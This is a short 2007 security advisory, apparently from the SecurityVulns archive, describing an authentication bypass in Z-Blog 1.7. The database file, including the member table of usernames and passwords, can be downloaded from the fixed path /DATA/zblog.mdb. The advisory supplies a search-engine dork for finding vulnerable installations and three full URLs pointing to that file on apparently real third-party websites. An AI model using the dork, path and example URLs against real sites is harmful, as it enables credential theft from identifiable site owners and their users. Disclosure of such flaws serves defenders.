Z-Blog 1.7 Authentication Bypass Database Download Vulnerability

2007-06-01T00:00:00
ID SECURITYVULNS:DOC:17150
Type securityvulns
Reporter Securityvulns
Modified 2007-06-01T00:00:00

Description

  • Author : Hasadya Raed
  • Contact : RaeD@BsdMail.Com ~>Israel Hacker
  • Greetz : Fairoz :)
  • Advisory : Z-Blog 1.7 Authentication Bypass/Database Download Vulnerability
  • Script : Z-Blog 1.7
  • Impact : Remote
  • Googledork : "Powered by Z-Blog 1.7" , "Powered By Z-Blog 1.7 Laputa Build 70216"
  • Download : http://bbs.rainbowsoft.org/attachment.php?aid=92

--/ REPRODUCE \--

Attackers Can Authentication Bypass In This Product By Add The Following Files:

('/DATA/zblog.mdb') And Download The Database Which Contains Table Named [blog_Member] The Users Names And Passwords Inside

--/ Examples \--

http://www.uistudio.cn/blog/DATA/zblog.mdb http://www.kenyja.com/blog/DATA/zblog.mdb http://www.netpub.cn/nffish/DATA/zblog.mdb